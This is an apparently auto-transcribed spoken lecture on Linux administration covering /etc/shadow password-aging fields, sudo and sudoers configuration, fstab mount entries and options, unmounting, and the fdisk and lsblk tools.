the minimum password age meaning that they are not required to change their password um they can or they’re not required to wait any number of days to change their password so they could change their password immediately that’s what the minimum password age means they can change their password every day if they wanted to the 99999 this thing right here means that they have 99,999 days until they are required to change their password next time so this would most likely need to be set to let’s say 90 so that you can have the user change their password every 3 months for security purposes so this is a very important field as well so the zero is kind of understandable so you don’t want you know they can change their password any day that they want they can change their password daily if they wanted to but this piece right here is a security issue so nine 999,000 days almost 100,000 days they they are given almost 100,000 days before they’re required by the system to change their password again and that’s very very important to understand as a security issue you want to change that to make it 90 days for example or 120 days or something like that so that there is a definitive limit on how long they can go with the same password and it would be required to change their password and then there’s the password warning period so we already talked about the 99999 uh the password warning period which is represented by the seven this time is the number of days before password expires that the user is warned to change it now in this particular case it would be 99992 so it’s still too long right so they need to have uh let’s say still 90 days and then on day 83 they would be notified that hey in 7 days you need to change your password the password inactivity period in this particular case is represented by this uh colon that’s separated by these two other colons the number of days after password expires during which the account is still usable and in this case there is none so if the password is expired that means they have to change their password in order for them to use their account again and then they have the another one colon right here the date when the account so actually I was uh incorrect so the very next colon is what we’re talking about for the inactivity period the second colon is the date when the account will be disabled represented as the number of days since January 1970 which has not been assigned here either and the final colon is reserved for future uses so these last three colons especially this particular one so the password inactivity would be the number of days after a password expires during the account still usable which in this case is none so as soon as it expires they have to change their password the account expiration date there is none because as long as they’re in the system as long as they’re an employee as long as it’s your computer and you haven’t deleted your username for example that’s not going to change and then you have the reserve field that’s been reserved for future uses for a variety of other reasons and so that is the full uh explanation of a line inside of the Etsy Shadow file so as we’ve already discussed the Etsy password file it can be world uh World readable meaning that everybody essentially can read it but the password placeholder should be X meaning that it would be less sensitive so that that is potentially something that you can do if you wanted to do it like that um I still think that the password file should not be uh World readable because lower privileged users should not get access to all of the usernames inside of that system because we have gone through a variety of pen testing exercises that we found a variety of different users and then we did Brute Force exercises to be able to find the passwords for a variety of different users and then kind of did uh lateral movements and then eventually had vertical movements until we got higher privileges so this should in my opinion should not be World readable but it can be World readable um so that as long as the password hash has been uh replaced by this x then technically it should be fine the Etsy Shadow file however should only be readable by the root user because of the fact that it has the encrypted password hashes and that is a very very strict um file that only the root user or root users just in case you’re working in a company and one person is out sick or uh you want to have redundancy you have a a s just a handful of people who work in it who are the highest level of management that have root user uh permissions that can go ahead and access the data that is inside of this thing and the thing is you don’t need to give everybody root permission because not everybody needs to see these password hashes anyways because you can just reset somebody’s password very easily without having access to their password hashes so that’s the that’s the piece where it’s like okay it is understandable that they say that only the singular root user is the person that has access to the Etsy Shadow file because somebody could just be an IT administrator beyond the suit’s list and they have permission to reset somebody’s password if they’ve been locked out or expired so on and so forth so um these are the major security considerations to think about when you’re looking at these two specific files uh in particular so managing pseudo permissions uh granting the ability to users to execute commands with root privileges via pseudo is a critical aspect of system administration because you want to have redundancies with your administrators you don’t want everything to rely on one person this involves adding people to the pseudo group configuring the pseudo file and applying command restrictions for fine-tuned Access Control so when somebody’s in the pseudo file essentially they can run pseudo command and they can do really basically what any root user would be able to do they may not be the root user but they could be in the pseudo Group which means that they have those administrator privileges those higher level Privileges and the pudor file is really the highest level of privilege that somebody can get because they can modify and manipulate a lot of different things inside of the system adding users to the pseudor group is as simple as doing pseudo user mod add to group and then the group pseudo and then the username that you want to add to that group so it’s very very simple to do except this is a very very powerful command the command that you see in front of you is a very powerful command that somebody can run and now whoever this person is right here they have the key to the kingdom so to speak so um basic pseudo permission adding you just use the user mod add to the group pseudo and then give the username and this is just a breakdown of how that command works so user mod AG pseudo and then the username and you already know what all of this means and how these things break down so that’s how you add somebody to the pseudo group The pseudo group and this is an example so we’re just adding Alice to the to the pseudo group so this one’s kind of redundant but uh now you’ve seen this in multiple regards so you can see how you can add somebody to the pseudo group or really again any group right so if we just replace pseudo with whatever the group name is we’re adding Alice to that group so this is how we do the fine-tuning This Is How We Do the controlling of what people can do inside of the pseudo group so the pseudo configuration file is located as the Etsy pseudo location and it controls pseudo permissions for users and groups basically showing you what commands they can actually run with pseudo if they are inside the pseudo group so if you want to edit this you would do it with v sudo and you go Pudo vudo and the explanation is that this is the safer way to edit the sudo’s file because it checks for syntax errors before you save it so you don’t want to do this with Nano or Vim because vudo actually checks for syntax errors and then it’ll open the pseudor file and the default editor that you have it just does it while checking for syntax errors and once you’re inside of the sudos file you can Bas basically uh designate or define specific commands that people can run with pseudo when they’re inside of the pseudo group so for example um giving somebody full pseudo access would be assigning their username so this would be Alice for example and they she has all all all all so she has all of the permissions the breakdown is whoever the name of the user is the first all allows pseudo access from any terminal so all of the terminals would be this one so on all terminals she has access and then all all inside of the parenthesis right here allows her to run commands as any user and as any group and then the last one is allowing her to run any command so she can do it from any terminal as any user in any group and she can run all of the commands so she’s getting granted full pseudo access if you want to Grant pseudo access without a password which is another one of those things that like now you’re just giving this person literally everything in the Kingdom you just add that no password uh parameter or that no password argument inside of this piece and now she has access to everything so uh on all terminals as all users no password required she can run all of the commands and now she has access to the entire Kingdom um if you want to restrict access to a specific command which is most likely what you’re going to end up doing this is what it looks like so you have the username she can run on all of the terminals as whatever user no password required but she can run system control the user uh this is the full path of the system control binary and the system uh and the reboot uh binary so this is how you and then it’s separated by a comma and a space right so you have the path of whatever the command is meaning the binary path to whatever the command is so whoever the username is can run the system control and reboot commands with pseudo without a password this is what we’re seeing over here so uh this is how you specify what commands they can run by assigning the actual binary path inside of the user directory inside of our root directory so root user user binaries and then system control and this is what this specific user can run without a password requirement and just to make it legit for Alice this is our example of giving Alice that permission so Alice can run on all terminals uh as whatever user no password required the user bin system CTL binary and that’s pretty much it that’s how you uh specify what Alice can run on a computer so just to give you a couple of practical examples here so we got adding a user to the pseudo group so we got pseudo user mod add to group The pseudo uh add to the pseudo group excuse me the user Bob um we have pseudo vudo that edits the pseudor file so it opens it with vudo so that you can actually get all of your syntax checked automatically by the system to make sure your syntax is correct and then we have the managing of the pseudo permissions and our summary here so granting and configuring pseudo access involves adding people to the pseudo group editing the pseudo file with vse sudo and defining the command restrictions for fine-tuned Access Control you don’t want to do all all all all you don’t want to give them everything right so you get them access to the pseudo group get the pseudo file open with vudo so that you have your syntax correct and then you just want to give the specific path to the binary that they should have access to which means the commands that they can run and this ensures that the user has necessary permissions to perform administrative tasks while maintaining security which is very very important in this regard so security is a big deal and we’re going to go into security as its individ ual chapter and everything but we are now bringing all of these Concepts into play so you you’ve talked about file permissions so far and we’ve talked about groups that they can add to and inheriting the permissions of these various groups and now we’re talking about the ultimate Group which is the pseudo group and inheriting the permissions of that group but now you want to limit the individual command that these people can run as pseudo and that’s how we assigned that was going into the pseudo file with Etsy pseudo and then opening up the pseudo file with vudo to make sure that we can actually uh get our syntax correct as we’re doing these things and then from there we say okay these are all the different commands that you can run so that’s how you do that and as a last example over here we got the full series of commands here so you have the user uh mod so pseudo user mod adding the person into the pseudo group right here and then you open up vudo and then you go and use various options so for example the no password option or giving them all terminal access so on and so forth inside of the sudor file and then the username all equals all no password so on and so forth this means that this person whoever this guy is this username person can run this particular system control without any password requirement and that’s the only thing that they’ve been given pseudo access to without a password or even if they had a password this is the only thing that they have access to that they can run they don’t have all assigned to all of the commands that they can run because that would be silly that would be careless on our part as system administrators so this is it this is the very final cheat sheet kind of a thing that you get for permissions and uh pseudo and so on and so forth and we can now jump into the next piece right here which is file management and file systems all right so let’s get deep into the file management and file systems uh so the file system hierarchy standards and the directory structure uh is what we’re going to be talking about uh as a review these are the key directories that we have inside of our FHS our file uh file system hierarchy standard um the FHS defines the directory structure and contents in Linux helping maintain consistency across a variety of distribution so you will see this in pretty much every distribution of Linux the main directory is the root directory then you have the binaries then you have the Etsy you have home VAR temp you’ve we’ve talked about all of these things so none of this is news to you unless you actually skipped that particular uh section of this training but it was towards the very beginning where we went through the file system hierarchy so these are our key directories and since these are the key directories and I mean there’s also a lot of uh a variety of other directories as well that kind of fall under the the ne not NE primary directory so if you go back to the section that we were talking about partitioning uh it was in chapter 3 uh if you visit that or if you kind of re remind yourself of everything that we talked about we have the primary partitions and then we have the extended and The Logical partitions and uh this goes into directly into the concept of mounting and unmounting file systems or partitions within file systems so here’s what that uh is going to look like so we have the mounting of file systems so when you mount something you’re attaching the file system to a directory so that it’s accessible within the larger directory tree and you would do this with the mount command so uh you have any given file system you attach that file system and this could be the xfs file system it could be a fat 32 or a variety of other file systems you you’re essentially mounting it you’re attaching it to Any Given directory and then we’ll as you can see right here we’ll just talk about a few different ways that you can do that but when you do this you’re making that file system accessible you attach it to your directory uh hierarchy so that it can be accessible uh through the OS and through for whatever the user is that’s using it so on and so forth so uh in order to do that you would use the mount command and this is a pseudo command so you uh you have the pseudo uh pre-command I guess we can call it or the qualifier at the beginning of this so pseudo Mount and then you have the device name which is going to be mounted onto the mount point so you would find out what the device name is running Dev and again we also talked about this as we were going through the installation uh part of chapter 3 and I showed you how to find the various devices that are currently mounted or plugged in so to speak the the devices that are currently plugged in to your system and then from there you would get the path to that device and uh it usually uh is something like you know disk 4 or something like this it’s like it’s not a complicated thing so it would just be for slev and then there would just be the device name or the the name that the system has given to it and then from there you would give it the mount point which is the path that you wanted to be attached to so using an option like T would specify the type of the file system so if it’s the xt4 means that that’s the type of file system that you’re working with and then this is so this is what I mean right here so you see how it says Dev device name in this case it’s saying sdb1 so it’s the standard dis uh portion one of that so this is the second one that the second physical uh partition the physical disc that’s been attached to this particular system cuz SDA would be the first one sdb would be the second one SDC would be the third one so on and so forth and then you have the first portion of that physical device the first partition of that physical device that’s being mounted onto the mount uh directory inside of our root directory so that’s typically what it would look like and you’re just saying that I’m dealing with an xt4 or I want to be mounted as an xt4 right so there are various options and we’re going to go through all of this again I have to constantly remind you we’re going to go through all of these as we go through the Practical portion of the command but this is what essentially it looks like you use the mount command to mount any given um file system or any given specific partition a primary partition and extended partition you can mount that onto a mount Point um you can also declare automatic mounting and this is done inside of the ETFs tab uh configuration file that defines all the file systems that should be automatically mounted when you start your system so when you boot your system there would be either one or two or a handful of file systems that you want to be mounted as the system starts so you don’t have to manually mount everything this is a this is considered a manual Mount what we’re doing over here and sometimes you want to do that sometimes you want to unmount something as well but automatic mounting is typically for this the file systems and the partitions that you’re going to be using regularly so you’re going to use an automatic mounting configuration that’s inside of the fs tab file inside of the Etsy folder the ety fs tab is essentially where all of that stuff is housed so the dis partitions or any other file systems that you have that should be automatically mounted all of those configurations are going to be inside the F FS Tab and then each line in the fs tab represents a file system and the mount options that are attached to it so this is what it would potentially look like inside an example or typic the typical FS tab uh file so um you have the file system first and then you have the mount point you would have the type of the file system and then any options that you want to attach to it The Dump location and the pass location so as an example uh we have have the file system right here so just breaking this down it could be the dev sd1 which refers to the first partition on the first sat drive so you have SD for the SAT drive you have the a representing the first SATA drive and then one representing the first partition of that SATA drive so that would be the file system that would fill in right here a more robust way to specify this using the universally unique ident identifier would be this piece right here so you could do a uu ID and then fill in The UU ID instead of giving the path to the partition itself that you want to use obviously that requires that you know The UU ID which you can also find running the previous commands that we ran to find our partitions that are attached to our system uh you could have a label and the label variable equaling the value of whatever that label name would be and specifying whatever that file system is by its label typically this is like um what do I have I have like a SanDisk uh something something something I don’t know I don’t know what the name of the the the drives are but let’s say you have an external drive and it’s a SanDisk drive and it has the label name the label name is very different from its uuid obviously and label from the partition location or the partition path that’s been assigned inside of your system this is actually what it looks like when you plug it in and then you see your list of connections and then it says oh you know this is this particular one and then you can change the label name so I always change them because uh number one I don’t like spaces in the names I want the whole thing to just be one word and then I turn it into an acronym that I understand and I also put the size of it so uh primary 2 terabytes for example that would be like one of the labels that I would rename mine to so that I I know exactly which one I’m dealing with as I go through my uh my standard discs or my external hard drives so to speak speak um and then we have the server share path as well so this is a n network file system like for example the SMB or CFS file system uh those are network connections that are being accessed from a separate location from a remote location so it’s sitting on a file server somewhere and then you’ve connected to that file server and now you have the path to that file server that’s going to be inside of your file system variable so all of these fall under this very first piece right here which is referring to the file system so since now we have the location that we’re pulling the file system we now need to give it the mount point which is the location that it’s going to be mounted upon so the mount point is the directory where the file system is going to be mounted so it could be the very root directory it could be inside of the home directory it could be inside of the mount data directory um which typically is the Mount point for any addition additional data drives the user directories so all of the home directories for users are going to be mounted on to the home directory and this would be you know for every user that you have you typically would need to assign inside of the ET CFS tab entry inside of the ETFs tab directory or configuration file my mat uh so inside of this configuration file you would assign the actual home directory for the user inside of the home directory path that we have for the route so uh this would be done one time inside the fs Tab and then as soon as the system is booted and the it’s up and live and running uh it’s going to be accessible and everything is going to be mounted you don’t want to be doing that every single time especially if you have like literally dozens or hundreds or thousands of employees and in a lot of environments especially when it gets that big and you have that many people to deal with it becomes something that is done with a script because you would probably get a dozen employees per day or something per week or something like that and that’s just not something that you want to do manually because it’s so much faster to do it with a script and then you can also avoid making any errors if you use a script so uh root file system the user home directories the mount and data points for any additional data drives so we have the location that it exists we have the location that we want it to be mounted to and now we need to give the type of the file system that we are dealing with so xt4 xfs NF FS V fat which is one of the variations of the fat file system so fat 32 so on and so forth so we had uh all of these we have already talked about these various file system types but you would need to know what type of file system it is that you’re mounting so that you can give it the type in this particular variable and then the system will know how to interact with it and uh for the most part the most commonly used is going to be xt4 which is for Linux file systems in you know personal computers or in small environments xfs is the high performance file system that usually is used for a file server um and for a web server for example which would most likely be combined with some kind of a network path because if you’re accessing it remotely from a uh from a series of uh computers that are in a different city for example uh that is going to require the network path for the file system name right here instead of the the file system nickname or something like that you actually need to give it the network connection path that you have over there and the NFS would also be the type that would be used in in that regard so if it’s internal and you’re hardwired to it then you would use x xfs as the type but if you’re accessing it from the network connection then it would be NFS for the network file system and then vat is just one of the fat file systems that’s often used to USB drives or external hard drives that are being attached via a USB wire or even a fire wire or something like that it’s just something that’s being externally attached it’s an external hard drive that’s being connected to the machine and then we have our options that we need to attach to this particular path uh so it could be the mount options that control uh how the file system is actually mounted um it can be multiple options that are attached to this and the default options you can uh refer to them by just saying defaults and those are the wsid Dev exec Auto no user and async all of these happen all at the same time I’m not going to break these down right now you’re more than welcome to Google them if you want to but these are all mounted or assigned to this particular uh FS tab entry by just using the defaults uh entry or the defaults option um there is no a time which prevents the file system from updating the access times there is r o which mounts the file system as a read only there’s RW which mounts the file system as a read WR which is what’s represented right here um and then a variety of other options that you’re more than welcome to go check out and uh I’ll actually just show you what all of those options are real quick okay so we have the defaults option as we already mentioned which will include all of these options right here and the example entry would look like this so this is the partition it’s being mounted onto the root it’s an xt4 type of of a file system and we’re adding the defaults to it and the defaults would add all of these individual uh options as one entry which would be this piece right here then you have the RW by itself which is this guy right here and RW represents the read and write mode so that somebody that anybody that gets access to it has read and write capabilities you have r o which represents read only uh you have no exec which prevents the execution of any binary on the mounted file system um and that is actually not included on here because this is the exec meaning that they can execute all of the binaries on that particular file system no suid disables the set user identification or set group identifier bits that we just talked about in our previous uh sections uh making sure that you can or the the person who’s running anything from this doesn’t do it with the permissions of the owner or the creator of it then we have the no Dev which does not interpret character or block devices on the file system and really what that means uh is that the users cannot create device nodes within that specific directory structure which enhances the security by restricting access to that devices management functions on a mounted partition so the users can’t create devices on that specific file system they can’t attach uh external devices or create any virtual devices attached to that particular file system so no Dev if you can recall what we were talking about with the actual Dev partition or the dev portion of the file system and how it creates a file structure for a printer that may be added or for the driver of the printer for example or a USB drive or something like that so when you think about what that’s what Dev does then you can think about no Dev meaning that it doesn’t allow them to do that on this particular file system that’s been mounted uh no a time is the does not update the access time on files when they are read so this will improve performance potentially uh but it’s essentially the access time on files so you open a file and then there’s a little uh meta data that’s updated that says oh this file was accessed last at this particular date and time so this is the piece that you’re going to remove from there no dur a time does not update the access time on directory so very similar to the last piece uh ra a Time updates the access time only if the previous access time is older than the current modify time which obviously it would have to be uh which improves the performance while maintaining some of the a Time functionality so it will add an access time only if the previous access time is older than the current modified time which again it it would seem like how would somebody go go and access something at a date that is uh newer than the old like what that part is like if the previous access time is older meaning so the very last access time was June 1st and then I’m accessing it today on June 10th so obviously the previous access time is going to be older so that’s the that’s the thing that I’m like okay whatever that doesn’t make sense but okay um then there is the user which allows a normal user to mount the file system um meaning that somebody that is not an administrator or a pseudo user they to mount the F system and in no user only the super user can mount the file system meaning the super user being the root or the administrator or somebody that’s on the pseudo list and then you have Auto which is the mounting of the file system at boot automatically which is one of those things that was actually included I believe in our big list at the top right here yep we have the big list and then you have no user that’s also one of the ones that’s here Dev meaning that you can mount other uh file systems onto it or create device nodes onto it there is the suid which means that people can actually access and run this with the permissions of the person who was the owner and then async so let’s see if we can go and check that out specifically at the bottom right here uh no Auto preventing it from being automatically loaded we have sync which is all input and output operations are done synchron synchronously um and then you have async which all input and output operations are done asynchronously and let’s find find out what those things mean specifically okay so actually this is very uh easy to understand so all input operations being input output operations being done asynchronously means that when the computer performs the operation for example reading from a file or writing to a network it doesn’t have to wait for that operation to finish before continuing with the other tasks meaning if it is synchronously it has to wait for the previous task to finish so that it can move on to other one uh if you do asynchronously it can run those things simultaneously so the program can send the input output request and continue executing other code while the input output operation happens in the background receiving a notification only when the operation is completed which is actually very helpful so that’s probably why this is one of the defaults which is it is async right asynchronously um and then we have the ACL so it enables the access control lists for the file system system and the access control list uh whatever that is on your uh specific uh computer that’s been or on your system that’s been configured it’ll just enable that access control list for this particular partition as well so we have a few examples in this case or one at least one example in this case where the example entry would be something like this where you have the SATA uh a so the very first uh disc and then the first partition of the dis it’s being mounted Ed on the mount storage extension it is an xt4 file system it has the defaults as well as no a time and then we have zero and two and so we can really quick find out what the zero and two are as we go through the rest of our options but it gives us right here so no dump option so uh the zero represents the D dump option which is set to zero for file systems that should not be dumped which means they shouldn’t be downloaded you should not have the option to be able to dump everything from from that file system onto your current machine and then the pass option sets the order in which the file systems are checked at boot so when you’re running the boot this particular file system is going to be done second in line and that’s what those dump and uh pass options stand for and we literally just talked about it so zero would in this case represent do not dump and then one would represent dump defile system so that is something that would be the those are the only two options that are available for the dump parameter in this particular case uh which means that uh it’s a backup type of a feature right so it indicates whether or not that file system should be dumped and backed up um if it has the one that means it is going to be dumped and it is going to be backed up uh if it has a zero it’s not going to be dumped and it will not be backed up uh when you look at a a hash dump or a data dump or anything like that that means it’s being taken from where it’s currently sitting and it’s being dumped onto this particular Mount Point okay so it’s going to go from here and it’s going to be dumped onto here at boot right because this is something that we’re putting configuring for our boot options when we start the system and as it goes through all the various partitions and file systems that we have it’s going to check for this and then if it should be dumped or should not be dumped and it’ll if it is supposed to be dumped it’s going to go from this location and it’s going to be dumped onto that location and then of course pass as we already just talked about it as well so um zero would be do not check so this is the order in which to file systems are checked at boot time by the fs check utility so zero would be don’t check it one would be checked the system first usually the root file system and then two would be check the system after the first one has been checked so you have zero don’t check it one check it as the root which is typically the root file system so we’re not going to mess with it unless it is the actual root file system you’re not going to turn that into one the only thing that should be checked primarily before anything else should be the root file system and then you have the two which is basically check it after the other file system meaning after the root file system you can check this one and then you can assign two to essentially all of the other file systems that have been mounted onto this particular machine uh because they all come after the file system does the root file system they all come after the root file system does okay okay so this is an example of our FS tab file so uh we have these columns so the file system itself the mount point the type of the file system any options that would be attached to it and then we have the dump uh whether or not it should be dumped and then the pass whether or not it should be passed and so you have The UU ID in this particular case and then you have this one external uh or this uh extra partition that’s been attached because it’s the SAT disk B which would be secondary and then the first partition on that uh drive so you’re looking at the uuids here this particular file system is being mounted onto our root so this is standard this is going to be a standard entry on the fs tab because you have to mount the root every single time that you boot a computer it is an xd4 type file system and it’s going to be mounted with the default options and of course it’s going to be passed uh at one meaning it’s going to be checked primarily before anything else is checked and then you have the secondary file system which is going to be everything inside of the home location which would be all of our users so xd4 again all the defaults no dump required and it’s going to be checked second in line after the rout has been checked and then you have this particular one which is our swap space so if you remember talking about our swap partition for our uh partitioning section this is our swap partition and it is a swap type and it is a s SW option uh because it represents Swap and then there is no dump required for it because it’s going to be rebooted or wiped every single time that we reboot the system and it’s not going to be checked because for the most part at boot this is empty right so if you reboot the system the swap space gets emptied out the swap file gets emptied out so when you’re booting the system which is what this whole thing represents right so the Etsy FS tab is the configurations that are uh run when the system is booted and all of these things are being mounted on boot so when you boot the system the swap space is empty so there’s no requirement for us to check it to run FS check on it and then you have the dev sdb1 which is one of our external or secondary uh file systems that is being mounted onto this particular location and it’s going to be mounted on to our mount data partition and the sdb 1 is also an xt4 type of a file system there is no access time that is assigned to this so no defaults or anything like that it’s just a no access time that’s been uh assigned to it and then it has a dump of zero we don’t want to back it up and then it’s being checked after the root as well so if you notice all of these things are going to be checked so if this was a longer list essentially every other thing would also be checked with the exception of the swap space cuz it’s unnecessary to check it and then the options would be the only thing that would change for it um and then you would have the order in which they’re being checked which apart from the root all of them are going to have an option of two or zero which would be the swap space itself so this would be the example of the Etsy FS tab file and so this is the actual explanations of what I just gave you so if you want this you can just pause the screen real quick take a screenshot of this but it literally just explains everything that I just explained in this particular slide right here so if you want to take a screenshot or pause it or take these notes whatever it is feel free to do so right now 1 2 3 moving on okay so unmounting the file system is something else that you would need to do this typically is not going to be done with the fs uh CH or the fs uh okay so unmounting the file system will typically be done manually using the um Mount command this typically is not in the fs tab configuration file and it is just done manually using pseudo umount and then the mount Point itself or pseudo umount the device name so either one of those things so since we have the uh the mount point you could ount via the mount Point itself or you could umount uh by the device name that’s been attached to it right there so um let’s go back to this direction okay so there we go so that is the command that we’re going to have to be able to unmount something and it’s a crucial step to prevent any data loss or corruption especially uh for removable storage devices like USB drives and things like that so this is actually um in a GUI in a graphic user interface you would typically either right click on it and unmount it or there’s like an eject button that’s next to it that you would click on the eject button and it would unmount it for you but when you’re inside of a uh command line interface like a lot of Linux servers are and they don’t have a gue uh when you’re inside of that environment you would need to use the umount option so that you can unmount it and make sure that it’s saving everything it needs to save and then usually if something is open inside of that partition inside of that for example that USB drive if there’s a file that’s being accessed from the USB drive and that file hasn’t been saved usually you’re going to get some kind of a notification saying hey there’s something from this USB is being used and you need to save and close it before you unmount this and that’s always a notice that you would get if you’re running Windows or Mac OS or something that has a g when you try to unmount it or disconnect it instead of just you know obviously hopefully you’re not just pulling it out of the USB location um I sometimes do that but I only do it when I know for a fact that I have all of the files closed or I’ve saved what I need to save and I can just pull it out and just make sure that you know I can be certain that nothing is going to happen to the file that I was dealing with but if you haven’t saved something or or if it’s still in use then you’re going to get that notification and basically just save it and then close out whatever software is using it and then you can unmount it without any problems and just to kind of articulate the reasons to unmount just to make sure that you’re all good and you understand what we’re doing so um there’s something called a buffered right so os’s often use a process called buffering to improve performance instead of writing the data to the dis immediately they temporarily just store the data in your random access memory which is volatile memory which is temporary memory because it’s going to get wiped when the system reboots so when you unmount it it takes all the buffer data and actually writes it to the disk so it takes it out of the ram out of the random access memory and it actually writes it to the dis and then that way you can when you unmount you can be sure that everything that’s currently buffering and just kind of hang hanging out in limbo it’s actually being written onto the disc so you don’t lose any of your data um then there’s the flush cach a so when you uh unmount something you flush the cache and cach a is kind of another one of those temporary storages that just houses some data uh meaning anything that’s pending uh any kind of pending right operations are completed and the data is accurately transferred to the storage device and then it comes out of the cache and it actually goes into the device itself it’s written onto the device and you don’t have to worry about losing that data um another reason would be the Integrity of the file system so uh when you unmount it you cleanly close the file system and you make sure that the data inside of it and the state of it is consistent and it hasn’t been corrupted in any way um which is actually very useful it’s like a good habit to have because most likely you’re not going to ruin the Integrity of the USB especially in a lot of modern USBS most likely you’re going to be fine but if you do that repeated there could be some uh mess you know something that happens where the the corruption in this particular case corruption is like a very strong word but the Integrity of the USB may be messed up the Integrity of your file system may be messed up it may not run as quickly it may not save what it needs to save if you just keep doing it repeatedly without properly unmounting it and then of course uh the corruption of the data so if the network file is removed or disconnected connected or the USB drive USB drives typically are fine I’m not I’m still going to tell you to unmount it and just make sure that you eject it properly so that part is going to be fine but a network file system if you remove it or disconnect from that without properly unmounting within that relay of data because if it’s Network connected that means there’s definitely something hanging in The Ether in that connection that you have with it and if you don’t unmount it then the the data will potentially be lost because it’s just going to be hanging in The Ether in the medium portion of that connection it’s not going to be on the actual server that you’re pulling from and it’s not going to be on your actual machine it’s going to be somewhere in the middle and if you don’t unmount then you’re going to lose all of that data in transit and then it makes the file unreadable or the file system itself will become unusable uh most likely it’s not going to destroy the file system but it is going to lose some data in that Transit and you just don’t want to do that then you have preventing access conflicts so files may get locked so if you open a file and process might still be running or something might still be interacting with that file system unmounting it make sure that all the file handles are closed and no processes are using it so this is what I was referring to earlier when I said like something may still be using it a software may be using it so for example when I’m editing a video as an example all of my video files are stored on an external driver because I don’t want to take any space on my actual computer and if I still have Premiere Pro open and it’s still using any of those raw files or my project files and I try to unmount I’m going to get a notification saying I can’t unmount this like my computer will say this can’t be unmounted because of the fact that or you know dis can’t be ejected that’s another way that it says it because the fact that there’s a program that’s still using it in some capacity so this is the portion right here where it’s like it locks the file right it won’t disconnect I mean I can still pull it out right I can still pull it out of the USB but that process right there might lose my last save my auto save or it might affect some of my data or my video files or something like that so in that regard I’m like oh okay let me just go save Premiere let me close out Premiere and then that way I can unmount easily or eject the dis easily um there are shared resources and again this is inside of the networ connected file systems multiple users or uh systems may be accessing the same exact resources and if you unmount them it manages these resources and prevents the issues arising from unexpected disconnections right um Mak sure that everybody who is using it is notified number one that it’s being unmounted and it was unmounted or it just saves all of their work because it is a shared resource and you don’t want them to lose their stuff because it’s important stuff everybody’s working on something that’s relevant to the organization so you just want to make sure the shared resources are protected again I feel like Network file systems in my opinion are much more volatile and much more sensitive they uh than USBS right so they USBS are typically very resilient uh Network file systems are susceptible to uh loss of data because the fact that it’s being connected via an internet connection so that’s the piece that I think is kind of important to understand espec especially in a network file system you really want to make sure that you are unmounting that file system all right so some sample commands here so pseudo umount Dev stb1 pseudo umount and then the mount location itself so this would be the device name this would be the mount location um and this is the network file system this is a USB drive right so you mount and then whatever the name of it is inside of the the file system or the path of the network file system and that’s basically it it’s very very simple and so in summary for this particular section we want to flush all of our buffers you want to maintain Integrity you want to prevent any conflicts to close all the file handles and any processes um if you unmount correctly you help Safeguard the data and maintain the reliability of the file system and you always want to unmount before physically disconnecting USB drive or network shares to just make sure all the Integrity of the data is preserved and you don’t have any conflicts and now that we understand the mounting and unmounting and the importance of those two actions we want to talk about the actual management of the Diss and the various partitioning tools so Fisk the fixed dis is one of the tools that you’re going to use to create partitions and modify them or delete them so this is a command line utility that’s used to create modify or delete partitions and so uh you run it with pseudo and then you run f disk and then go into whatever the individual dis is that you want to partition so you would have to run pseudo f disk and the location of the actual physical drive and the physical file system or the physical disc that you’re going to be opening for partition and this could be done with a USB drive as well so this above Command right here it opens this particular dis for partitioning and then you can replace this with any device that you want to open for partitioning um a common command that you can run with it would be the print partitions command so it would be just the f disk and then p as the option which prints the current partition table showing all the existing partitions on the disk and we ran something very similar to this to find out what our partitions were earlier as we were installing Linux so it would be P for partition list right or print the partitions excuse me um you have n to create a new Partition so creating the partition you’ll be prompted to specify whether you want a primary or extended partition and the partition starting and ending sectors and then you have the usage for this which is going to be n right here so choose P for primary or E for extended which would be combined with the N uh command and then you can specify the partition number starting sector and ending sector or size and all of that will go into when we actually run these things practically I also think I have a couple of examples commands as we go through this as well so um deleting a partition would be done with the D command so deletes an existing partition you’ll be prompted to specify the partition number to delete and then specify the partition number to delete using the D command uh you can write changes so once you’ve made the changes you need to write them so you can enforce them so anything uh that is made all the changes to the dis uh that are made before you exit you have to write the changes otherwise they’re not going to be saved so you could be doing all the work creating partitions doing everything that you’ve done unless you actually write everything that you just did it’s not going to save when you exit so that’s the big piece that you got to keep in mind whatever edits you’re making deleting modifying adding anything that you’re making you need to use this W to make sure that it’s being written so that it saves it um you can set a partition as a bootable by using the a command with f disk which means that the partition will active uh will activate for boot purposes meaning on Startup when you start the partition or when you start the computer that you’re running that specific partition is going to be added to your list of bootable partitions meaning it’s going to go to the the fs tab uh configuration file so that’s what it means when you make something bootable so here’s our F example workflow with f dis so you open the dis using the f disk and then whatever the path is that you want to partition you partition uh or you print the partitions for help so P enter right so cuz you’ve opened it and you’re inside of the mode where you’re now interacting with Fisk you press p and then enter um you press n enter and then P for primary after you pressed n you are saying that you want to create a new Partition you would then enter either P or E so P for primary or E for an extended partition and then specify the partition number starting sector Etc and then you write the change is meaning you press W enter and then you can exit F dis safely because all of your work that you’ve done would be save lsblk so you should be familiar with ls because we already talked about LS inside of our introduction to the command line BLK would be the block devices so you’re doing lsblk to list the block devices um it’s displaying the information about all of the available block devices which are basically our partitions right the discs and the partitions in a tree like format and it’s a clear overview of what you have on that system as far as the storage configuration the device name the types the sizes the mount locations the amount points and every other piece of data uh that would be relevant to knowing about what your disk structure looks like and what your partitions look like the basic usage is you literally just press lsblk and you press enter and you see a tree format of what everything is on your computer and this is what the sample output looks like for list blocks devices so you have the name MCH Min RM size Ro O type and amount point so in this particular case we would have the first physical disc and then it has three partitions and then you have the second disc and it has one partition and then we can actually go and look at uh the various uh columns right here and what each one of them mean but for the most part you can try to understand what it is right so the very first line the type is that it’s an actual dis and then one two and three are the partitions of that disc and then you have another disc and you have a partition of that disc you have the mount point locations for each one of them uh this one right here is a swap space as you can see right here the size of them are going to all be listed here as well but just to give you a good idea of what all of these columns stand for uh we can go and look at our handy dandy AI assistant here so we have the common fields for the lsblk output so the name would just be the device name as we’ve already established the m and Min is the main major and minor device numbers in this particular case 80 or 81 uh the RM is then indicating whether it’s removable and for the most part if it is if it does have it that means it is a removable uh partition so zero would mean that it’s non- removable one means that it is removable the size would be the size of the device the r o indicating whether it’s read only so zero would be its read and write one would be its read only the type so dis part partition or ROM which is readon memory or swap as we just saw U Mount point would just be the path the path that has been mounted on the fs type would be the file system type The UU ID would be the universally unique identifier and then the label that has been attached as if it’s a backup or a data or so on and so forth so these are the individual uh fields that we have right here and we actually didn’t even have the label or anything like that so uh what we do see in this particular example is the the mag Min right here we have the removable so these ones are not removable this one because it is an external it is removable you have the sizes of this and then you have the the read only which means these are not read only um and then you have uh dis partition dis partition the mount point would be swap so on and so forth so that’s what we got that’s the output example and 